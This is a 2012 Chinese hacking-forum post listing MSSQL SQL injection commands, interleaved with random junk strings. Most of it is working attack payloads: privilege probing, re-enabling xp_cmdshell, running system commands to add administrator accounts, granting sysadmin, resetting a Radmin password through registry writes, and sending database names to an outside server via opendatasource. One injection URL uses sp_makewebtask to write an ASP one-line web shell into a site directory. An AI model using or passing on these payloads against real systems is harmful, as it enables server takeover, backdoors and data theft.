中国网络渗透测试联盟
标题:
常用的一些注入命令
[打印本页]
作者:
admin
时间:
2012-9-15 14:40
标题:
常用的一些注入命令
//看看是什么权限的
% [4 }# J& i" G2 v( q
and 1=(Select IS_MEMBER('db_owner'))
8 t6 J0 E) V; Z8 Q# m/ k q
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
2 T! t+ @& f2 Z! L$ c M" B+ p
: a2 F! {1 n' N
//检测是否有读取某数据库的权限
5 |8 k2 R' { h8 S( r
and 1= (Select HAS_DBACCESS('master'))
/ |$ e8 I6 g9 @/ }
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
- S! u/ \" J6 `# B5 c# e+ R! ?' l* F
) j8 u' @& b- K2 P
% L+ ^3 O& \' W$ {# e3 |7 X( P4 {! C
数字类型
1 b3 [6 _* N6 s( X
and char(124)%2Buser%2Bchar(124)=0
! e p: h. l: k9 ^' J
: J, s+ d8 |; C- P% v1 A$ T% q
字符类型
- q4 J4 L. K4 I
' and char(124)%2Buser%2Bchar(124)=0 and ''='
/ s3 [8 q% O0 W
4 N( k" W- N; T' u8 I
搜索类型
# I6 B! C6 ^+ k; m/ L( u3 D% u" ^
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
# r9 q( I* A; W4 {$ y+ {) W
0 `$ e0 [3 X" K
爆用户名
- p/ F) C2 ?7 V7 Q& O% K
and user>0
; z, ~, n! v6 p, ^# u! Q
' and user>0 and ''='
3 V q. F" u3 |; K& M4 l
& t2 H h. A7 @6 s
检测是否为SA权限
" h9 D9 Z0 o' ]+ M" K/ D+ |8 a
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
/ ?2 b# G% Q0 w i5 ] J' Q6 w0 E ~
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
) q0 I- `" U5 l. M7 b4 N3 G3 B2 d
7 ~3 H: B: \& \& t b
检测是不是MSSQL数据库
, y4 Y% D* N) m/ w6 @; u
and exists (select * from sysobjects);--
" @& Y- F9 R+ Z5 G/ v& Q( \
1 \8 g& O" v, L2 o9 ?
检测是否支持多行
! M* [3 A0 t9 l7 o; J7 u1 c0 p
;declare @d int;--
! i$ Q, ^ |0 E" m* b7 T& C
/ k- g8 v5 U' j5 m3 G. d" _4 p
恢复 xp_cmdshell
. _( C5 b, Q0 _& a3 k/ k, u
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
' Q9 X, g' ?8 Z) f! L9 E2 f
' H. z' a- ]* R' Y4 Z( B
5 v& z7 o. B" c6 x
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
8 }# g4 x. v+ W+ J: S2 h
* b( {$ T, F: m; A5 j& H0 C9 a
//-----------------------
1 y F. @1 \' U9 g. Q
// 执行命令
6 J- b7 I* G9 b+ V
//-----------------------
- H; U6 a: W, [: r, W- a$ z& i8 r
首先开启沙盘模式:
% r5 I( v, h2 g, p& X
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
* o) H( B2 \: ^* U- g; f8 T
5 }1 u# }4 D( p( I' j/ ~
然后利用jet.oledb执行系统命令
* \! f! M1 O1 Q* U
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
. }& K3 t1 V% p0 Z( g
. y2 {2 H* b; g# T* L2 @7 p
执行命令
* t# R2 v% P+ l& p0 `) r2 `
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
, \8 E3 B$ S7 g" |
2 I" c& e, o; }) S; J/ C
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
- ~. {) v/ V1 }
& X" H8 l( k$ I
判断xp_cmdshell扩展存储过程是否存在:
3 }$ v" d6 P. R
http://192.168.1.5/display.asp?keyno=188
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
# K* S4 g' C. n# E5 w$ S
7 z# @- _, c. J% r9 ?
写注册表
# V' e2 H7 P! R4 e( \. ~: Z0 @+ |/ w/ t0 z4 N
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
1 b" Z2 {+ k% E& j
3 A8 Z( h8 e' _$ U1 A& W5 r' u" y
REG_SZ
6 R' v9 M9 j$ j, g _" ?9 q2 e
% S* x1 U% I4 }* n# a9 p% c$ B/ x/ {
读注册表
" T8 B: V4 J: H4 x
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
/ T' ]: W }. Q r3 x/ Q+ P
& R2 S! r1 l5 W4 l8 c" P6 S
读取目录内容
& l3 Y7 P; }1 q2 F. X
exec master..xp_dirtree 'c:\winnt\system32\',1,1
: G# I, x1 C8 t+ D0 P
: I( S& z0 N( r* I! Z: w% n# h3 @
. j/ D/ D# W# d4 k% y2 k* w$ w
数据库备份
, w9 i. I4 g% m
backup database pubs to disk = 'c:\123.bak'
1 c& D# b" _; Z5 K# ?
" w+ Q. u% O! ~ \
//爆出长度
# t/ J( l) M5 h8 b8 H
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
2 I6 W7 a1 k4 g
, s% p5 N% k7 h$ j/ G
# [& l5 ]! q9 ?9 p
- T0 x' L& B5 j* I
更改sa口令方法:用sql综合利用工具连接后,执行命令:
! N5 q" R3 W }' ^) W& Y
exec sp_password NULL,'新密码','sa'
! G6 x9 i9 l- o. V
_+ k! x6 `( ]" C; z* C
添加和删除一个SA权限的用户test:
0 ?8 L0 p8 D: {/ m* o( [4 y5 g3 X
exec master.dbo.sp_addlogin test,9530772
" U% ]' V1 ?$ u, k9 z' R
exec master.dbo.sp_addsrvrolemember test,sysadmin
3 I" I: _: {5 ~" O# _) A
7 ~- e4 L! d$ Q6 J2 M$ j
删除扩展存储过过程xp_cmdshell的语句:
4 a0 c) R+ f4 L4 k
exec sp_dropextendedproc 'xp_cmdshell'
4 b9 t8 O! H0 v+ [& S
/ N9 H6 S. F! j/ d) p+ T
添加扩展存储过过程
# z5 z8 C. L# G4 R, t( O: L5 M
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
( u% S' h- P+ g
GRANT exec On xp_proxiedadata TO public
* ?) I Q0 L3 O. I& g
8 }$ @' b2 s' {2 L0 ^# t
+ m* E0 \) S Y
停掉或激活某个服务。
, `+ O9 J" H3 S+ s& t: O
$ l7 A6 S( l' e( u8 w: q9 _# \0 M3 Q
exec master..xp_servicecontrol 'stop','schedule'
, [ s7 S( f5 }) L: c6 s
exec master..xp_servicecontrol 'start','schedule'
0 K# J \- A. O; H
) z, g/ V7 }1 [1 m2 {! Q% w/ O% j
dbo.xp_subdirs
1 p/ o+ q* l7 B0 K, @
# k1 J' D1 X! l5 D' ?
只列某个目录下的子目录。
# \/ K5 y4 t2 {% x9 {/ T0 v
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
, [6 x. m0 _. C: a& V
) e8 p/ C. G; B4 S+ Y6 G
dbo.xp_makecab
% g2 d5 F& {4 n1 C6 \' T
, i' s" n: v/ I' x/ j
将目标多个档案压缩到某个目标档案之内。
% F( z( e2 c: w- _% P
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
! h0 a, U! N7 d( j! {
! i& x4 k. A5 ]: B5 c6 K
dbo.xp_makecab
& @8 O% ?! O% E: b! }( r$ _ p% J1 m
'c:\test.cab','mszip',1,
# S. M. N4 u& C0 L
'C:\Inetpub\wwwroot\SQLInject\login.asp',
, O0 P( U1 W/ a e- c/ v. H( j8 E
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
* T: p3 f6 G _; m+ x& }/ a
! N y9 @+ Y) m+ i1 O
xp_terminate_process
1 g) H5 J$ j, u7 j2 e8 `4 x! \' y
# j$ c6 y0 O0 q+ ]1 Z5 e
停掉某个执行中的程序,但赋予的参数是 Process ID。
1 @% ]% m- Z: a. ~7 @) Z
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
% S% e% D7 ^. Q1 t
A- T1 y* S- {# ?2 O' M' s
xp_terminate_process 2484
, u( U. C. D' a
# h. H e9 X! x6 p# i% d
xp_unpackcab
) L# R0 M/ |: U- A# g+ g' t/ @$ u
3 R- _; V, R$ l) q3 a% Z2 H8 _
解开压缩档。
1 Q8 y& z8 V( b1 z/ |/ [- k& z
8 B# o( G3 r) h
xp_unpackcab 'c:\test.cab','c:\temp',1
[9 i: q, L3 Q, |
% d* T! U& A9 A8 y- v! J) W
4 r! I4 b8 j0 m& ^! T. t, C: A
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
& a* N( `% P$ v' m+ \$ D
0 L8 y' F0 m9 q H4 X; R& X
create database lcx;
/ U8 w K& _6 C" p, N5 P
Create TABLE ku(name nvarchar(256) null);
6 G$ ^6 ^' {$ R+ W' f7 [: W
Create TABLE biao(id int NULL,name nvarchar(256) null);
, v" f6 i" Z5 M
0 b* p, M( { L# e
//得到数据库名
0 _, G# A& s$ [9 f) K* @4 o
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
$ r# R! e- y3 @9 v/ S
7 h2 S3 O3 @6 S
# U8 @ g; v: _
//在Master中创建表,看看权限怎样
T* j2 A: K( [) Q. b2 g7 s
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
: Q. O! t* b* t$ T
$ G3 c0 W/ \! }8 I
用 sp_makewebtask直接在web目录里写入一句话马:
; O9 p+ j( U4 s" N5 k' C* B
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:
\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
- W# E6 ]& \9 z& `# S1 m
5 o/ s: I: h- z( \7 i, n( H( A
//更新表内容
& V, U) Y* m6 P! {- y8 f4 B
Update films SET kind = 'Dramatic' Where id = 123
7 p5 S: N8 a1 s: n" p" n& T5 e4 L
! w- o6 J: _! j7 a: J" y
//删除内容
, S( |3 D0 Q1 C; h
delete from table_name where Stockid = 3
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2